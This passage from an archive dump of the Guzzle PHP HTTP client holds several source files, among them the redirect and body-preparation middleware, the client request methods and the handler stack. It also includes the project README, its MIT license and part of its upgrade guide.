This might be an exception, a integer representing an error code, or * anything else. Relying on this value assumes that you know what handler * you are using. * * @return mixed */ public function getHandlerErrorData() { return $this->handlerErrorData; } /** * Get the effective URI the request was sent to. */ public function getEffectiveUri(): UriInterface { return $this->request->getUri(); } /** * Get the estimated time the request was being transferred by the handler. * * @return float|null Time in seconds. */ public function getTransferTime(): ?float { return $this->transferTime; } /** * Gets an array of all of the handler specific transfer data. */ public function getHandlerStats(): array { return $this->handlerStats; } /** * Get a specific handler statistic from the handler by name. * * @param string $stat Handler specific transfer stat to retrieve. * * @return mixed|null */ public function getHandlerStat(string $stat) { return $this->handlerStats[$stat] ?? null; } } google-api/vendor/guzzlehttp/guzzle/src/MessageFormatterInterface.php000064400000001057147600400120022212 0ustar00nextHandler = $nextHandler; } public function __invoke(RequestInterface $request, array $options): PromiseInterface { $fn = $this->nextHandler; // Don't do anything if the request has no body. if ($request->getBody()->getSize() === 0) { return $fn($request, $options); } $modify = []; // Add a default content-type if possible. if (!$request->hasHeader('Content-Type')) { if ($uri = $request->getBody()->getMetadata('uri')) { if (is_string($uri) && $type = Psr7\MimeType::fromFilename($uri)) { $modify['set_headers']['Content-Type'] = $type; } } } // Add a default content-length or transfer-encoding header. if (!$request->hasHeader('Content-Length') && !$request->hasHeader('Transfer-Encoding') ) { $size = $request->getBody()->getSize(); if ($size !== null) { $modify['set_headers']['Content-Length'] = $size; } else { $modify['set_headers']['Transfer-Encoding'] = 'chunked'; } } // Add the expect header if needed. $this->addExpectHeader($request, $options, $modify); return $fn(Psr7\Utils::modifyRequest($request, $modify), $options); } /** * Add expect header */ private function addExpectHeader(RequestInterface $request, array $options, array &$modify): void { // Determine if the Expect header should be used if ($request->hasHeader('Expect')) { return; } $expect = $options['expect'] ?? null; // Return if disabled or if you're not using HTTP/1.1 or HTTP/2.0 if ($expect === false || $request->getProtocolVersion() < 1.1) { return; } // The expect header is unconditionally enabled if ($expect === true) { $modify['set_headers']['Expect'] = '100-Continue'; return; } // By default, send the expect header when the payload is > 1mb if ($expect === null) { $expect = 1048576; } // Always add if the body cannot be rewound, the size cannot be // determined, or the size is greater than the cutoff threshold $body = $request->getBody(); $size = $body->getSize(); if ($size === null || $size >= (int) $expect || !$body->isSeekable()) { $modify['set_headers']['Expect'] = '100-Continue'; } } } google-api/vendor/guzzlehttp/guzzle/src/RedirectMiddleware.php000064400000017660147600400120020667 0ustar00 5, 'protocols' => ['http', 'https'], 'strict' => false, 'referer' => false, 'track_redirects' => false, ]; /** * @var callable(RequestInterface, array): PromiseInterface */ private $nextHandler; /** * @param callable(RequestInterface, array): PromiseInterface $nextHandler Next handler to invoke. */ public function __construct(callable $nextHandler) { $this->nextHandler = $nextHandler; } public function __invoke(RequestInterface $request, array $options): PromiseInterface { $fn = $this->nextHandler; if (empty($options['allow_redirects'])) { return $fn($request, $options); } if ($options['allow_redirects'] === true) { $options['allow_redirects'] = self::$defaultSettings; } elseif (!\is_array($options['allow_redirects'])) { throw new \InvalidArgumentException('allow_redirects must be true, false, or array'); } else { // Merge the default settings with the provided settings $options['allow_redirects'] += self::$defaultSettings; } if (empty($options['allow_redirects']['max'])) { return $fn($request, $options); } return $fn($request, $options) ->then(function (ResponseInterface $response) use ($request, $options) { return $this->checkRedirect($request, $options, $response); }); } /** * @return ResponseInterface|PromiseInterface */ public function checkRedirect(RequestInterface $request, array $options, ResponseInterface $response) { if (\strpos((string) $response->getStatusCode(), '3') !== 0 || !$response->hasHeader('Location') ) { return $response; } $this->guardMax($request, $response, $options); $nextRequest = $this->modifyRequest($request, $options, $response); // If authorization is handled by curl, unset it if URI is cross-origin. if (Psr7\UriComparator::isCrossOrigin($request->getUri(), $nextRequest->getUri()) && defined('\CURLOPT_HTTPAUTH')) { unset( $options['curl'][\CURLOPT_HTTPAUTH], $options['curl'][\CURLOPT_USERPWD] ); } if (isset($options['allow_redirects']['on_redirect'])) { ($options['allow_redirects']['on_redirect'])( $request, $response, $nextRequest->getUri() ); } $promise = $this($nextRequest, $options); // Add headers to be able to track history of redirects. if (!empty($options['allow_redirects']['track_redirects'])) { return $this->withTracking( $promise, (string) $nextRequest->getUri(), $response->getStatusCode() ); } return $promise; } /** * Enable tracking on promise. */ private function withTracking(PromiseInterface $promise, string $uri, int $statusCode): PromiseInterface { return $promise->then( static function (ResponseInterface $response) use ($uri, $statusCode) { // Note that we are pushing to the front of the list as this // would be an earlier response than what is currently present // in the history header. $historyHeader = $response->getHeader(self::HISTORY_HEADER); $statusHeader = $response->getHeader(self::STATUS_HISTORY_HEADER); \array_unshift($historyHeader, $uri); \array_unshift($statusHeader, (string) $statusCode); return $response->withHeader(self::HISTORY_HEADER, $historyHeader) ->withHeader(self::STATUS_HISTORY_HEADER, $statusHeader); } ); } /** * Check for too many redirects. * * @throws TooManyRedirectsException Too many redirects. */ private function guardMax(RequestInterface $request, ResponseInterface $response, array &$options): void { $current = $options['__redirect_count'] ?? 0; $options['__redirect_count'] = $current + 1; $max = $options['allow_redirects']['max']; if ($options['__redirect_count'] > $max) { throw new TooManyRedirectsException("Will not follow more than {$max} redirects", $request, $response); } } public function modifyRequest(RequestInterface $request, array $options, ResponseInterface $response): RequestInterface { // Request modifications to apply. $modify = []; $protocols = $options['allow_redirects']['protocols']; // Use a GET request if this is an entity enclosing request and we are // not forcing RFC compliance, but rather emulating what all browsers // would do. $statusCode = $response->getStatusCode(); if ($statusCode == 303 || ($statusCode <= 302 && !$options['allow_redirects']['strict']) ) { $safeMethods = ['GET', 'HEAD', 'OPTIONS']; $requestMethod = $request->getMethod(); $modify['method'] = in_array($requestMethod, $safeMethods) ? $requestMethod : 'GET'; $modify['body'] = ''; } $uri = self::redirectUri($request, $response, $protocols); if (isset($options['idn_conversion']) && ($options['idn_conversion'] !== false)) { $idnOptions = ($options['idn_conversion'] === true) ? \IDNA_DEFAULT : $options['idn_conversion']; $uri = Utils::idnUriConvert($uri, $idnOptions); } $modify['uri'] = $uri; Psr7\Message::rewindBody($request); // Add the Referer header if it is told to do so and only // add the header if we are not redirecting from https to http. if ($options['allow_redirects']['referer'] && $modify['uri']->getScheme() === $request->getUri()->getScheme() ) { $uri = $request->getUri()->withUserInfo(''); $modify['set_headers']['Referer'] = (string) $uri; } else { $modify['remove_headers'][] = 'Referer'; } // Remove Authorization and Cookie headers if URI is cross-origin. if (Psr7\UriComparator::isCrossOrigin($request->getUri(), $modify['uri'])) { $modify['remove_headers'][] = 'Authorization'; $modify['remove_headers'][] = 'Cookie'; } return Psr7\Utils::modifyRequest($request, $modify); } /** * Set the appropriate URL on the request based on the location header. */ private static function redirectUri( RequestInterface $request, ResponseInterface $response, array $protocols ): UriInterface { $location = Psr7\UriResolver::resolve( $request->getUri(), new Psr7\Uri($response->getHeaderLine('Location')) ); // Ensure that the redirect URI is allowed based on the protocols. if (!\in_array($location->getScheme(), $protocols)) { throw new BadResponseException(\sprintf('Redirect URI, %s, does not use one of the allowed redirect protocols: %s', $location, \implode(', ', $protocols)), $request, $response); } return $location; } } google-api/vendor/guzzlehttp/guzzle/src/ClientTrait.php000064400000021456147600400120017350 0ustar00request('GET', $uri, $options); } /** * Create and send an HTTP HEAD request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function head($uri, array $options = []): ResponseInterface { return $this->request('HEAD', $uri, $options); } /** * Create and send an HTTP PUT request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function put($uri, array $options = []): ResponseInterface { return $this->request('PUT', $uri, $options); } /** * Create and send an HTTP POST request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function post($uri, array $options = []): ResponseInterface { return $this->request('POST', $uri, $options); } /** * Create and send an HTTP PATCH request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function patch($uri, array $options = []): ResponseInterface { return $this->request('PATCH', $uri, $options); } /** * Create and send an HTTP DELETE request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function delete($uri, array $options = []): ResponseInterface { return $this->request('DELETE', $uri, $options); } /** * Create and send an asynchronous HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string $method HTTP method * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ abstract public function requestAsync(string $method, $uri, array $options = []): PromiseInterface; /** * Create and send an asynchronous HTTP GET request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function getAsync($uri, array $options = []): PromiseInterface { return $this->requestAsync('GET', $uri, $options); } /** * Create and send an asynchronous HTTP HEAD request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function headAsync($uri, array $options = []): PromiseInterface { return $this->requestAsync('HEAD', $uri, $options); } /** * Create and send an asynchronous HTTP PUT request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function putAsync($uri, array $options = []): PromiseInterface { return $this->requestAsync('PUT', $uri, $options); } /** * Create and send an asynchronous HTTP POST request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function postAsync($uri, array $options = []): PromiseInterface { return $this->requestAsync('POST', $uri, $options); } /** * Create and send an asynchronous HTTP PATCH request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function patchAsync($uri, array $options = []): PromiseInterface { return $this->requestAsync('PATCH', $uri, $options); } /** * Create and send an asynchronous HTTP DELETE request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function deleteAsync($uri, array $options = []): PromiseInterface { return $this->requestAsync('DELETE', $uri, $options); } } google-api/vendor/guzzlehttp/guzzle/src/HandlerStack.php000064400000021005147600400120017457 0ustar00push(Middleware::httpErrors(), 'http_errors'); $stack->push(Middleware::redirect(), 'allow_redirects'); $stack->push(Middleware::cookies(), 'cookies'); $stack->push(Middleware::prepareBody(), 'prepare_body'); return $stack; } /** * @param (callable(RequestInterface, array): PromiseInterface)|null $handler Underlying HTTP handler. */ public function __construct(callable $handler = null) { $this->handler = $handler; } /** * Invokes the handler stack as a composed handler * * @return ResponseInterface|PromiseInterface */ public function __invoke(RequestInterface $request, array $options) { $handler = $this->resolve(); return $handler($request, $options); } /** * Dumps a string representation of the stack. * * @return string */ public function __toString() { $depth = 0; $stack = []; if ($this->handler !== null) { $stack[] = '0) Handler: '.$this->debugCallable($this->handler); } $result = ''; foreach (\array_reverse($this->stack) as $tuple) { ++$depth; $str = "{$depth}) Name: '{$tuple[1]}', "; $str .= 'Function: '.$this->debugCallable($tuple[0]); $result = "> {$str}\n{$result}"; $stack[] = $str; } foreach (\array_keys($stack) as $k) { $result .= "< {$stack[$k]}\n"; } return $result; } /** * Set the HTTP handler that actually returns a promise. * * @param callable(RequestInterface, array): PromiseInterface $handler Accepts a request and array of options and * returns a Promise. */ public function setHandler(callable $handler): void { $this->handler = $handler; $this->cached = null; } /** * Returns true if the builder has a handler. */ public function hasHandler(): bool { return $this->handler !== null; } /** * Unshift a middleware to the bottom of the stack. * * @param callable(callable): callable $middleware Middleware function * @param string $name Name to register for this middleware. */ public function unshift(callable $middleware, string $name = null): void { \array_unshift($this->stack, [$middleware, $name]); $this->cached = null; } /** * Push a middleware to the top of the stack. * * @param callable(callable): callable $middleware Middleware function * @param string $name Name to register for this middleware. */ public function push(callable $middleware, string $name = ''): void { $this->stack[] = [$middleware, $name]; $this->cached = null; } /** * Add a middleware before another middleware by name. * * @param string $findName Middleware to find * @param callable(callable): callable $middleware Middleware function * @param string $withName Name to register for this middleware. */ public function before(string $findName, callable $middleware, string $withName = ''): void { $this->splice($findName, $withName, $middleware, true); } /** * Add a middleware after another middleware by name. * * @param string $findName Middleware to find * @param callable(callable): callable $middleware Middleware function * @param string $withName Name to register for this middleware. */ public function after(string $findName, callable $middleware, string $withName = ''): void { $this->splice($findName, $withName, $middleware, false); } /** * Remove a middleware by instance or name from the stack. * * @param callable|string $remove Middleware to remove by instance or name. */ public function remove($remove): void { if (!is_string($remove) && !is_callable($remove)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a callable or string to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->cached = null; $idx = \is_callable($remove) ? 0 : 1; $this->stack = \array_values(\array_filter( $this->stack, static function ($tuple) use ($idx, $remove) { return $tuple[$idx] !== $remove; } )); } /** * Compose the middleware and handler into a single callable function. * * @return callable(RequestInterface, array): PromiseInterface */ public function resolve(): callable { if ($this->cached === null) { if (($prev = $this->handler) === null) { throw new \LogicException('No handler has been specified'); } foreach (\array_reverse($this->stack) as $fn) { /** @var callable(RequestInterface, array): PromiseInterface $prev */ $prev = $fn[0]($prev); } $this->cached = $prev; } return $this->cached; } private function findByName(string $name): int { foreach ($this->stack as $k => $v) { if ($v[1] === $name) { return $k; } } throw new \InvalidArgumentException("Middleware not found: $name"); } /** * Splices a function into the middleware list at a specific position. */ private function splice(string $findName, string $withName, callable $middleware, bool $before): void { $this->cached = null; $idx = $this->findByName($findName); $tuple = [$middleware, $withName]; if ($before) { if ($idx === 0) { \array_unshift($this->stack, $tuple); } else { $replacement = [$tuple, $this->stack[$idx]]; \array_splice($this->stack, $idx, 1, $replacement); } } elseif ($idx === \count($this->stack) - 1) { $this->stack[] = $tuple; } else { $replacement = [$this->stack[$idx], $tuple]; \array_splice($this->stack, $idx, 1, $replacement); } } /** * Provides a debug string for a given callable. * * @param callable|string $fn Function to write as a string. */ private function debugCallable($fn): string { if (\is_string($fn)) { return "callable({$fn})"; } if (\is_array($fn)) { return \is_string($fn[0]) ? "callable({$fn[0]}::{$fn[1]})" : "callable(['".\get_class($fn[0])."', '{$fn[1]}'])"; } /** @var object $fn */ return 'callable('.\spl_object_hash($fn).')'; } } google-api/vendor/guzzlehttp/guzzle/README.md000064400000011652147600400120015102 0ustar00![Guzzle](.github/logo.png?raw=true) # Guzzle, PHP HTTP client [![Latest Version](https://img.shields.io/github/release/guzzle/guzzle.svg?style=flat-square)](https://github.com/guzzle/guzzle/releases) [![Build Status](https://img.shields.io/github/actions/workflow/status/guzzle/guzzle/ci.yml?label=ci%20build&style=flat-square)](https://github.com/guzzle/guzzle/actions?query=workflow%3ACI) [![Total Downloads](https://img.shields.io/packagist/dt/guzzlehttp/guzzle.svg?style=flat-square)](https://packagist.org/packages/guzzlehttp/guzzle) Guzzle is a PHP HTTP client that makes it easy to send HTTP requests and trivial to integrate with web services. - Simple interface for building query strings, POST requests, streaming large uploads, streaming large downloads, using HTTP cookies, uploading JSON data, etc... - Can send both synchronous and asynchronous requests using the same interface. - Uses PSR-7 interfaces for requests, responses, and streams. This allows you to utilize other PSR-7 compatible libraries with Guzzle. - Supports PSR-18 allowing interoperability between other PSR-18 HTTP Clients. - Abstracts away the underlying HTTP transport, allowing you to write environment and transport agnostic code; i.e., no hard dependency on cURL, PHP streams, sockets, or non-blocking event loops. - Middleware system allows you to augment and compose client behavior. ```php $client = new \GuzzleHttp\Client(); $response = $client->request('GET', 'https://api.github.com/repos/guzzle/guzzle'); echo $response->getStatusCode(); // 200 echo $response->getHeaderLine('content-type'); // 'application/json; charset=utf8' echo $response->getBody(); // '{"id": 1420053, "name": "guzzle", ...}' // Send an asynchronous request. $request = new \GuzzleHttp\Psr7\Request('GET', 'http://httpbin.org'); $promise = $client->sendAsync($request)->then(function ($response) { echo 'I completed! ' . $response->getBody(); }); $promise->wait(); ``` ## Help and docs We use GitHub issues only to discuss bugs and new features. For support please refer to: - [Documentation](https://docs.guzzlephp.org) - [Stack Overflow](https://stackoverflow.com/questions/tagged/guzzle) - [#guzzle](https://app.slack.com/client/T0D2S9JCT/CE6UAAKL4) channel on [PHP-HTTP Slack](https://slack.httplug.io/) - [Gitter](https://gitter.im/guzzle/guzzle) ## Installing Guzzle The recommended way to install Guzzle is through [Composer](https://getcomposer.org/). ```bash composer require guzzlehttp/guzzle ``` ## Version Guidance | Version | Status | Packagist | Namespace | Repo | Docs | PSR-7 | PHP Version | |---------|---------------------|---------------------|--------------|---------------------|---------------------|-------|--------------| | 3.x | EOL | `guzzle/guzzle` | `Guzzle` | [v3][guzzle-3-repo] | [v3][guzzle-3-docs] | No | >=5.3.3,<7.0 | | 4.x | EOL | `guzzlehttp/guzzle` | `GuzzleHttp` | [v4][guzzle-4-repo] | N/A | No | >=5.4,<7.0 | | 5.x | EOL | `guzzlehttp/guzzle` | `GuzzleHttp` | [v5][guzzle-5-repo] | [v5][guzzle-5-docs] | No | >=5.4,<7.4 | | 6.x | Security fixes only | `guzzlehttp/guzzle` | `GuzzleHttp` | [v6][guzzle-6-repo] | [v6][guzzle-6-docs] | Yes | >=5.5,<8.0 | | 7.x | Latest | `guzzlehttp/guzzle` | `GuzzleHttp` | [v7][guzzle-7-repo] | [v7][guzzle-7-docs] | Yes | >=7.2.5,<8.4 | [guzzle-3-repo]: https://github.com/guzzle/guzzle3 [guzzle-4-repo]: https://github.com/guzzle/guzzle/tree/4.x [guzzle-5-repo]: https://github.com/guzzle/guzzle/tree/5.3 [guzzle-6-repo]: https://github.com/guzzle/guzzle/tree/6.5 [guzzle-7-repo]: https://github.com/guzzle/guzzle [guzzle-3-docs]: https://guzzle3.readthedocs.io/ [guzzle-5-docs]: https://docs.guzzlephp.org/en/5.3/ [guzzle-6-docs]: https://docs.guzzlephp.org/en/6.5/ [guzzle-7-docs]: https://docs.guzzlephp.org/en/latest/ ## Security If you discover a security vulnerability within this package, please send an email to security@tidelift.com. All security vulnerabilities will be promptly addressed. Please do not disclose security-related issues publicly until a fix has been announced. Please see [Security Policy](https://github.com/guzzle/guzzle/security/policy) for more information. ## License Guzzle is made available under the MIT License (MIT). Please see [License File](LICENSE) for more information. ## For Enterprise Available as part of the Tidelift Subscription The maintainers of Guzzle and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. [Learn more.](https://tidelift.com/subscription/pkg/packagist-guzzlehttp-guzzle?utm_source=packagist-guzzlehttp-guzzle&utm_medium=referral&utm_campaign=enterprise&utm_term=repo) google-api/vendor/guzzlehttp/guzzle/LICENSE000064400000002664147600400120014633 0ustar00The MIT License (MIT) Copyright (c) 2011 Michael Dowling Copyright (c) 2012 Jeremy Lindblom Copyright (c) 2014 Graham Campbell Copyright (c) 2015 Márk Sági-Kazár Copyright (c) 2015 Tobias Schultze Copyright (c) 2016 Tobias Nyholm Copyright (c) 2016 George Mponos Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/guzzlehttp/guzzle/UPGRADING.md000064400000150571147600400120015471 0ustar00Guzzle Upgrade Guide ==================== 6.0 to 7.0 ---------- In order to take advantage of the new features of PHP, Guzzle dropped the support of PHP 5. The minimum supported PHP version is now PHP 7.2. Type hints and return types for functions and methods have been added wherever possible. Please make sure: - You are calling a function or a method with the correct type. - If you extend a class of Guzzle; update all signatures on methods you override. #### Other backwards compatibility breaking changes - Class `GuzzleHttp\UriTemplate` is removed. - Class `GuzzleHttp\Exception\SeekException` is removed. - Classes `GuzzleHttp\Exception\BadResponseException`, `GuzzleHttp\Exception\ClientException`, `GuzzleHttp\Exception\ServerException` can no longer be initialized with an empty Response as argument. - Class `GuzzleHttp\Exception\ConnectException` now extends `GuzzleHttp\Exception\TransferException` instead of `GuzzleHttp\Exception\RequestException`. - Function `GuzzleHttp\Exception\ConnectException::getResponse()` is removed. - Function `GuzzleHttp\Exception\ConnectException::hasResponse()` is removed. - Constant `GuzzleHttp\ClientInterface::VERSION` is removed. Added `GuzzleHttp\ClientInterface::MAJOR_VERSION` instead. - Function `GuzzleHttp\Exception\RequestException::getResponseBodySummary` is removed. Use `\GuzzleHttp\Psr7\get_message_body_summary` as an alternative. - Function `GuzzleHttp\Cookie\CookieJar::getCookieValue` is removed. - Request option `exceptions` is removed. Please use `http_errors`. - Request option `save_to` is removed. Please use `sink`. - Pool option `pool_size` is removed. Please use `concurrency`. - We now look for environment variables in the `$_SERVER` super global, due to thread safety issues with `getenv`. We continue to fallback to `getenv` in CLI environments, for maximum compatibility. - The `get`, `head`, `put`, `post`, `patch`, `delete`, `getAsync`, `headAsync`, `putAsync`, `postAsync`, `patchAsync`, and `deleteAsync` methods are now implemented as genuine methods on `GuzzleHttp\Client`, with strong typing. The original `__call` implementation remains unchanged for now, for maximum backwards compatibility, but won't be invoked under normal operation. - The `log` middleware will log the errors with level `error` instead of `notice` - Support for international domain names (IDN) is now disabled by default, and enabling it requires installing ext-intl, linked against a modern version of the C library (ICU 4.6 or higher). #### Native functions calls All internal native functions calls of Guzzle are now prefixed with a slash. This change makes it impossible for method overloading by other libraries or applications. Example: ```php // Before: curl_version(); // After: \curl_version(); ``` For the full diff you can check [here](https://github.com/guzzle/guzzle/compare/6.5.4..master). 5.0 to 6.0 ---------- Guzzle now uses [PSR-7](https://www.php-fig.org/psr/psr-7/) for HTTP messages. Due to the fact that these messages are immutable, this prompted a refactoring of Guzzle to use a middleware based system rather than an event system. Any HTTP message interaction (e.g., `GuzzleHttp\Message\Request`) need to be updated to work with the new immutable PSR-7 request and response objects. Any event listeners or subscribers need to be updated to become middleware functions that wrap handlers (or are injected into a `GuzzleHttp\HandlerStack`). - Removed `GuzzleHttp\BatchResults` - Removed `GuzzleHttp\Collection` - Removed `GuzzleHttp\HasDataTrait` - Removed `GuzzleHttp\ToArrayInterface` - The `guzzlehttp/streams` dependency has been removed. Stream functionality is now present in the `GuzzleHttp\Psr7` namespace provided by the `guzzlehttp/psr7` package. - Guzzle no longer uses ReactPHP promises and now uses the `guzzlehttp/promises` library. We use a custom promise library for three significant reasons: 1. React promises (at the time of writing this) are recursive. Promise chaining and promise resolution will eventually blow the stack. Guzzle promises are not recursive as they use a sort of trampolining technique. Note: there has been movement in the React project to modify promises to no longer utilize recursion. 2. Guzzle needs to have the ability to synchronously block on a promise to wait for a result. Guzzle promises allows this functionality (and does not require the use of recursion). 3. Because we need to be able to wait on a result, doing so using React promises requires wrapping react promises with RingPHP futures. This overhead is no longer needed, reducing stack sizes, reducing complexity, and improving performance. - `GuzzleHttp\Mimetypes` has been moved to a function in `GuzzleHttp\Psr7\mimetype_from_extension` and `GuzzleHttp\Psr7\mimetype_from_filename`. - `GuzzleHttp\Query` and `GuzzleHttp\QueryParser` have been removed. Query strings must now be passed into request objects as strings, or provided to the `query` request option when creating requests with clients. The `query` option uses PHP's `http_build_query` to convert an array to a string. If you need a different serialization technique, you will need to pass the query string in as a string. There are a couple helper functions that will make working with query strings easier: `GuzzleHttp\Psr7\parse_query` and `GuzzleHttp\Psr7\build_query`. - Guzzle no longer has a dependency on RingPHP. Due to the use of a middleware system based on PSR-7, using RingPHP and it's middleware system as well adds more complexity than the benefits it provides. All HTTP handlers that were present in RingPHP have been modified to work directly with PSR-7 messages and placed in the `GuzzleHttp\Handler` namespace. This significantly reduces complexity in Guzzle, removes a dependency, and improves performance. RingPHP will be maintained for Guzzle 5 support, but will no longer be a part of Guzzle 6. - As Guzzle now uses a middleware based systems the event system and RingPHP integration has been removed. Note: while the event system has been removed, it is possible to add your own type of event system that is powered by the middleware system. - Removed the `Event` namespace. - Removed the `Subscriber` namespace. - Removed `Transaction` class - Removed `RequestFsm` - Removed `RingBridge` - `GuzzleHttp\Subscriber\Cookie` is now provided by `GuzzleHttp\Middleware::cookies` - `GuzzleHttp\Subscriber\HttpError` is now provided by `GuzzleHttp\Middleware::httpError` - `GuzzleHttp\Subscriber\History` is now provided by `GuzzleHttp\Middleware::history` - `GuzzleHttp\Subscriber\Mock` is now provided by `GuzzleHttp\Handler\MockHandler` - `GuzzleHttp\Subscriber\Prepare` is now provided by `GuzzleHttp\PrepareBodyMiddleware` - `GuzzleHttp\Subscriber\Redirect` is now provided by `GuzzleHttp\RedirectMiddleware` - Guzzle now uses `Psr\Http\Message\UriInterface` (implements in `GuzzleHttp\Psr7\Uri`) for URI support. `GuzzleHttp\Url` is now gone. - Static functions in `GuzzleHttp\Utils` have been moved to namespaced functions under the `GuzzleHttp` namespace. This requires either a Composer based autoloader or you to include functions.php. - `GuzzleHttp\ClientInterface::getDefaultOption` has been renamed to `GuzzleHttp\ClientInterface::getConfig`. - `GuzzleHttp\ClientInterface::setDefaultOption` has been removed. - The `json` and `xml` methods of response objects has been removed. With the migration to strictly adhering to PSR-7 as the interface for Guzzle messages, adding methods to message interfaces would actually require Guzzle messages to extend from PSR-7 messages rather then work with them directly. ## Migrating to middleware The change to PSR-7 unfortunately required significant refactoring to Guzzle due to the fact that PSR-7 messages are immutable. Guzzle 5 relied on an event system from plugins. The event system relied on mutability of HTTP messages and side effects in order to work. With immutable messages, you have to change your workflow to become more about either returning a value (e.g., functional middlewares) or setting a value on an object. Guzzle v6 has chosen the functional middleware approach. Instead of using the event system to listen for things like the `before` event, you now create a stack based middleware function that intercepts a request on the way in and the promise of the response on the way out. This is a much simpler and more predictable approach than the event system and works nicely with PSR-7 middleware. Due to the use of promises, the middleware system is also asynchronous. v5: ```php use GuzzleHttp\Event\BeforeEvent; $client = new GuzzleHttp\Client(); // Get the emitter and listen to the before event. $client->getEmitter()->on('before', function (BeforeEvent $e) { // Guzzle v5 events relied on mutation $e->getRequest()->setHeader('X-Foo', 'Bar'); }); ``` v6: In v6, you can modify the request before it is sent using the `mapRequest` middleware. The idiomatic way in v6 to modify the request/response lifecycle is to setup a handler middleware stack up front and inject the handler into a client. ```php use GuzzleHttp\Middleware; // Create a handler stack that has all of the default middlewares attached $handler = GuzzleHttp\HandlerStack::create(); // Push the handler onto the handler stack $handler->push(Middleware::mapRequest(function (RequestInterface $request) { // Notice that we have to return a request object return $request->withHeader('X-Foo', 'Bar'); })); // Inject the handler into the client $client = new GuzzleHttp\Client(['handler' => $handler]); ``` ## POST Requests This version added the [`form_params`](https://docs.guzzlephp.org/en/latest/request-options.html#form_params) and `multipart` request options. `form_params` is an associative array of strings or array of strings and is used to serialize an `application/x-www-form-urlencoded` POST request. The [`multipart`](https://docs.guzzlephp.org/en/latest/request-options.html#multipart) option is now used to send a multipart/form-data POST request. `GuzzleHttp\Post\PostFile` has been removed. Use the `multipart` option to add POST files to a multipart/form-data request. The `body` option no longer accepts an array to send POST requests. Please use `multipart` or `form_params` instead. The `base_url` option has been renamed to `base_uri`. 4.x to 5.0 ---------- ## Rewritten Adapter Layer Guzzle now uses [RingPHP](https://ringphp.readthedocs.org/en/latest) to send HTTP requests. The `adapter` option in a `GuzzleHttp\Client` constructor is still supported, but it has now been renamed to `handler`. Instead of passing a `GuzzleHttp\Adapter\AdapterInterface`, you must now pass a PHP `callable` that follows the RingPHP specification. ## Removed Fluent Interfaces [Fluent interfaces were removed](https://ocramius.github.io/blog/fluent-interfaces-are-evil/) from the following classes: - `GuzzleHttp\Collection` - `GuzzleHttp\Url` - `GuzzleHttp\Query` - `GuzzleHttp\Post\PostBody` - `GuzzleHttp\Cookie\SetCookie` ## Removed functions.php Removed "functions.php", so that Guzzle is truly PSR-4 compliant. The following functions can be used as replacements. - `GuzzleHttp\json_decode` -> `GuzzleHttp\Utils::jsonDecode` - `GuzzleHttp\get_path` -> `GuzzleHttp\Utils::getPath` - `GuzzleHttp\Utils::setPath` -> `GuzzleHttp\set_path` - `GuzzleHttp\Pool::batch` -> `GuzzleHttp\batch`. This function is, however, deprecated in favor of using `GuzzleHttp\Pool::batch()`. The 